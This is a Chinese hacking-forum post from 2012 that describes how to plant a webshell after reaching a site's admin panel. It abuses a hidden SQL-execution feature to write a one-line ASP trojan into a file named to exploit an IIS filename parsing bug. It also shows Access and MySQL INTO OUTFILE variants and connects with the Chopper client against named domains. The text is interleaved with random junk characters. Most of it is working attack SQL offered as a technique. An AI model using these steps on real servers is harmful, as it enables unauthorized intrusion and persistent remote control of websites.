好不容易进了后台,发现啥上传啊。备份啊多木有。4 o3 A! h8 y7 P7 i' I
webshell一直拿不到。后来翻了一下源码。有一个执行SQL命令的$ H) P# V' J+ S% V- F+ j
文件。可后台没显示这功能。直接填上文件名字,执行命令的选项出来了,1 \4 T8 W/ U7 k9 t
然后就试用了下面的命令导出一句话木马。没想到成功了。命令方法如下:3 ^- g3 o8 a2 H/ S! k r: L
1.create table cmd (a varchar(50))
7 u9 o' @3 o1 m5 |" X% b# P2.insert into cmd (a) values (‘‘)2 m& G( k' [% k4 Y% a
3.select * into [a] in ‘D:\wwwroot\www.koohik.com\hacker.asa;.xls’ ‘excel 4.0;’ from cmd/ E# g& ^& R6 j, F2 `, c4 V9 H+ E% ^
(把表cmd的内容导出为物理路径的一个EXCEL文件)! S$ l$ d8 l; K; n! l7 O# ?
4.drop table cmd' G& j* p7 U0 ~
利用IIS的BUG成功拿到了WEBSHELL。- \$ _9 G% ?) w+ ?$ e0 {9 i
% j* r) l: T& p6 T/ U直接菜刀里连接http://www.chouwazi.com/data/xiao.asp;xiao.xls一句话
' y7 c: e7 v' q( A0 d! P" O( }# {+ _# _& y. I
SQL语句意思解释:
0 U# h. g. Y ^) H+ L D2 H 第一句; r3 G( ]4 I7 r- E4 ]0 c& r
建立一个有一个A字段的表 表名为cmd 字段类型为字符 长度为506 d, l4 L) m9 R- y# W6 O0 I
( o3 Y7 |+ l4 K& {2 V r( k0 r 第二句
% x b3 ]* b4 A. t8 V% Q4 ]" |( i 在表cmd的a字段插入一句话木马
4 M# D2 h, k+ W1 K$ x; ^ K 第三句
, P7 b7 f/ l; t 把cmd表a的内容导出到路径e:\host\chouwazi.com\web\data\的EXCEL文件
% X3 b' ~) s k! O
+ n3 [+ N2 _: l# U3 A 第四句
- C& _1 {& @ i( j T; T4 V 删除建立的cmd表
( P( E) B4 J" [/ e
1 y" ]% \( i. [! ^; S7 O3 v! ^4 d 以下内容为测试:3 N( y* h6 F5 f$ t8 I
Access利用后台SQL执行命令功能导出WebShell:' a A, p9 d1 l% b6 C5 t0 @
这个更简单:
( K8 j- u7 f* D" `: q) B [ol][li]Select 'asp一句话木马' into [vote] in 'd:/chouwazi.com/x.asp;.xls' 'excel 8.0;' from vote [/li][/ol]2 Y, w* _' _+ ]4 @8 X
或者
8 U) K* F/ R3 U8 w! `( U* ~ [ol][li]Select 'php一句话木马' into outfile 'F:/wwwroot/chouwazi.com/eval.php'; [/li][/ol]# w- R$ }1 k: P) D7 t( U& B
7 k( ?& H% b6 }: s
后台有执行SQL语句功能(vote为已知表段)
8 C" Q( {0 [2 O6 r+ v 希望对大家有所帮助拿shell的又一个思路2 P# _( P/ T* Y" B8 n' o! `
|
发表于 2012-9-13 17:53:58
收藏
支持
反对